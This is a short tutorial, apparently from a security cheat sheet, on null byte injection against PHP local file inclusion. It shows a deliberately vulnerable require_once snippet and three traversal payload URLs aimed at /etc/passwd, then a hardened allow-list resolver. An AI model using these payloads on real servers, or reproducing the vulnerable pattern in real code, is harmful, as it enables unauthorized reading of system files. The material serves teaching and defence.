# Null Byte Injection

* **Useful when PHP appends an extension to the end of the file name.**
* In some specific cases you need to add a null byte terminator to the LFI/RFI vulnerable parameter. **A null byte is a byte with the value zero (%00 when URL-encoded, or 0x00 in hex) and represents a string termination point or delimiter character.** Adding a null byte to a payload can alter the intended program logic because **it immediately stops the string from being processed past the null byte. This means that any bytes after the null byte delimiter will be ignored.**

## **Example**

Consider the following code:

```
// Vulnerable: the request parameter is placed in the path without validation
$file = $_GET['page'];
require_once("/var/www/$file.php");
```

Now if we inject a path to /etc/passwd into it, it will look something like this:

```
// Effective result once $_GET['page'] is "../../../etc/passwd"
$file = "../../../etc/passwd";
require_once("/var/www/../../../etc/passwd.php");
```

In this case **we cannot conduct File Inclusion with the passwd file because the second line appends a PHP extension to the file name and effectively converts the passwd file to passwd.php**, which would result in a ‘file not found’ error. In such a case, **we can add a null byte to the passwd file name to terminate the string at the null byte and discard the ‘.php’ extension.**

## Null Byte

```
http://website/page=../../../etc/passwd%00

http://example.com/page=../../../../../../etc/passwd?

/etc/passwd%00jpg     
```
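
A hardened counterpart to the `require_once` snippet above, as an added example that is not part of the original page: it rejects null bytes, maps the parameter through an allow-list, and confirms the resolved path stays inside the page directory. `resolve_page()`, the allow-list entries and the temporary demo directory are hypothetical names, and the inputs are constructed.

```php
<?php
// Added example, not from the original page. resolve_page(), the allow-list
// and the demo directory are hypothetical names chosen for illustration.

function resolve_page(string $page, array $allowed, string $baseDir): ?string
{
    // $_GET values arrive URL-decoded, so %00 is a literal NUL byte here.
    if (strpos($page, "\0") !== false) {
        return null;
    }
    // Allow-list: only known page names are ever turned into a path.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // Defence in depth: the resolved file must still live under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree so the script runs offline.
$baseDir = sys_get_temp_dir() . '/nullbyte_demo_pages';
if (!is_dir($baseDir)) {
    mkdir($baseDir, 0700, true);
}
file_put_contents($baseDir . '/home.php', "<?php echo 'home';\n");

$allowed = ['home', 'about'];

// Constructed inputs, as they would appear in $_GET['page'] after decoding.
$samples = ['home', "../../../etc/passwd\0", '../../../etc/passwd', "home\0jpg", 'about'];

foreach ($samples as $page) {
    $path = resolve_page($page, $allowed, $baseDir);
    printf("%-32s => %s\n",
        json_encode($page, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected' : 'include ' . $path);
}
```

PHP 5.3.4 and later treat any filesystem path containing a null byte as invalid, so the truncation described on this page only works against older interpreters. The allow-list and base-directory check still matter on current versions because they also stop plain path traversal.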
